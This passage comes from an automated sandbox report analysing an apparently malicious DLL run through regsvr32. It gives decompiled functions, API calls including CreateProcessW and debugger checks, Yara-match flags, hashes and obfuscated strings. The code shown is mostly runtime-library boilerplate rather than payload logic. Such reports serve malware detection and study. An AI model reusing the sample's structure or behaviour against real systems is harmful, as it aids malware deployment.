                                                                                                0x1800064d5
                                                                                                0x1800064dc
                                                                                                0x1800064e5
                                                                                                0x1800064eb
                                                                                                0x1800064f3
                                                                                                0x1800064f7
                                                                                                0x1800064fe
                                                                                                0x180006500
                                                                                                0x18000650d
                                                                                                0x180006519
                                                                                                0x18000651b
                                                                                                0x180006523
                                                                                                0x180006527
                                                                                                0x18000652e
                                                                                                0x180006536
                                                                                                0x18000653a
                                                                                                0x180006551

                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
                                                                                                  • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                  • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                • API String ID: 2724796048-464481000
                                                                                                • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F53988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 415 f53988-f53a3e call f59f38 418 f53a44-f53ac6 call f4a940 415->418 419 f53acc-f53b12 CreateProcessW 415->419 418->419
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID: li
                                                                                                • API String ID: 963392458-3170889640
                                                                                                • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                • Instruction ID: e63864061e860e38363abd18de67b09625aa5e39598c778710588c11fb3017ab
                                                                                                • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                • Instruction Fuzzy Hash: EB41E67091CB848FDBA4DF18D0C979AB7E0FB98315F20495DE588C7296CB789884CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 422 18000d26c-18000d289 423 18000d2b4-18000d2c1 call 180008160 422->423 424 18000d28b-18000d29c call 1800086f4 call 1800085b8 422->424 430 18000d2c7-18000d2ce 423->430 437 18000d29e-18000d2b3 424->437 432 18000d306-18000d312 call 1800081b4 430->432 433 18000d2d0-18000d2db 430->433 432->437 434 18000d2dd 433->434 435 18000d2df call 18000d174 433->435 438 18000d301-18000d304 434->438 441 18000d2e4-18000d2eb 435->441 438->430 442 18000d2f2-18000d2fb 441->442 443 18000d2ed-18000d2f0 441->443 442->438 443->432
                                                                                                C-Code - Quality: 100%
                                                                                                			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}



                                                                                                0x18000d26c
                                                                                                0x18000d271
                                                                                                0x18000d276
                                                                                                0x18000d289
                                                                                                0x18000d28b
                                                                                                0x18000d295
                                                                                                0x18000d297
                                                                                                0x18000d2b3

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                • String ID:
                                                                                                • API String ID: 3215553584-0
                                                                                                • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 444 180008714-180008723 445 180008733-180008743 444->445 446 180008725-180008731 444->446 448 18000875a-180008772 RtlAllocateHeap 445->448 446->445 447 180008776-180008781 call 1800086f4 446->447 453 180008783-180008788 447->453 449 180008774 448->449 450 180008745-18000874c call 18000c08c 448->450 449->453 450->447 456 18000874e-180008758 call 18000abf8 450->456 456->447 456->448
                                                                                                C-Code - Quality: 44%
                                                                                                			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                                0x180008714
                                                                                                0x180008723
                                                                                                0x180008727
                                                                                                0x180008727
                                                                                                0x180008731
                                                                                                0x18000873f
                                                                                                0x180008743
                                                                                                0x18000874c
                                                                                                0x180008758
                                                                                                0x180008769
                                                                                                0x180008772
                                                                                                0x180008774
                                                                                                0x180008776
                                                                                                0x18000877b
                                                                                                0x180008788

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 71%
                                                                                                			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}










                                                                                                0x18000127c
                                                                                                0x18000127f
                                                                                                0x180001285
                                                                                                0x180001291
                                                                                                0x180001295
                                                                                                0x180001297
                                                                                                0x18000129e
                                                                                                0x1800012a2
                                                                                                0x1800012a7
                                                                                                0x1800012b0

                                                                                                APIs
                                                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                  • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                • String ID:
                                                                                                • API String ID: 108617051-0
                                                                                                • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadString$ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 80118013-0
                                                                                                • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastShowWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3252650109-0
                                                                                                • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3140674995-0
                                                                                                • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 65%
                                                                                                			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0xeaed15642a89
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}













                                                                                                0x1800082ec
                                                                                                0x1800082f1
                                                                                                0x1800082fa
                                                                                                0x180008302
                                                                                                0x180008309
                                                                                                0x180008313
                                                                                                0x180008324
                                                                                                0x180008326
                                                                                                0x180008332
                                                                                                0x180008338
                                                                                                0x180008343
                                                                                                0x180008349
                                                                                                0x180008353
                                                                                                0x18000835c
                                                                                                0x180008360
                                                                                                0x180008365
                                                                                                0x18000837a
                                                                                                0x18000837d
                                                                                                0x180008386
                                                                                                0x180008388
                                                                                                0x18000839b
                                                                                                0x1800083a8
                                                                                                0x1800083b1
                                                                                                0x1800083b8
                                                                                                0x1800083c5
                                                                                                0x1800083d7
                                                                                                0x1800083db
                                                                                                0x1800083e9
                                                                                                0x1800083ed
                                                                                                0x1800083f1
                                                                                                0x1800083fb
                                                                                                0x18000840e
                                                                                                0x180008412
                                                                                                0x180008417
                                                                                                0x180008446

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1239891234-0
                                                                                                • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4F8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                • API String ID: 0-182303197
                                                                                                • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                • Instruction ID: ffd1843cb2d792347fd3a22609872d3805c545e3b786e9d7b000107fa959c56b
                                                                                                • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                • Instruction Fuzzy Hash: CA122670A04709EFDB58DF68C18A99EBBF1FF48304F40816DE84AAB250D775DA18DB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F55384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                • API String ID: 0-557373213
                                                                                                • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                • Instruction ID: e2a87c19f20955ed26852883d092eb62686b2b0846db26bbf8fdd2923f1e22b0
                                                                                                • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                • Instruction Fuzzy Hash: E5E1027550160CCBDF68DF38C0994D93BE1FF58718F611229FC6AA62A2DB78D918CB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F48378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .I$gBfh$i[$w|${
                                                                                                • API String ID: 0-448909954
                                                                                                • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                • Instruction ID: 192f011f92c6255aba88882cc67dbd237c2deb85545f90746a6d52441553ed79
                                                                                                • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                • Instruction Fuzzy Hash: A6B11470D247499FCB88DFA9D8898DDBBF0FB48304F40921DE816AB250C778A985CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: cp$vm$x$zu$Kn#
                                                                                                • API String ID: 0-3521309225
                                                                                                • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                • Instruction ID: 0a75bf628e98b18295662829c813f8372853ab447e4b3184f3b745a5548722e9
                                                                                                • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                • Instruction Fuzzy Hash: 98A114B1D147198FDB48CFA8D8898EEBBF0FB58314F108219E855B7290D3789949CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F57518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                • API String ID: 0-817034907
                                                                                                • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                • Instruction ID: db72f82e6d25ff96bcd186c057a8e443de8ef91040709b1617ce07a1c50a4d17
                                                                                                • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                • Instruction Fuzzy Hash: 1B4192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,$3T$D-$Rc$l
                                                                                                • API String ID: 0-617906138
                                                                                                • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                • Instruction ID: 0d1952477fd2d2f237aca549ee727aef2aa9b8e46c7bf24e4e72165d65c15183
                                                                                                • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                • Instruction Fuzzy Hash: 3D41D5B081078E8FDB44CF64D88A4CE7FF0FB58358F104619EC69A6260D3B89668CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}



                                                                                                0x180001d98

                                                                                                APIs
                                                                                                Memory Dump Source
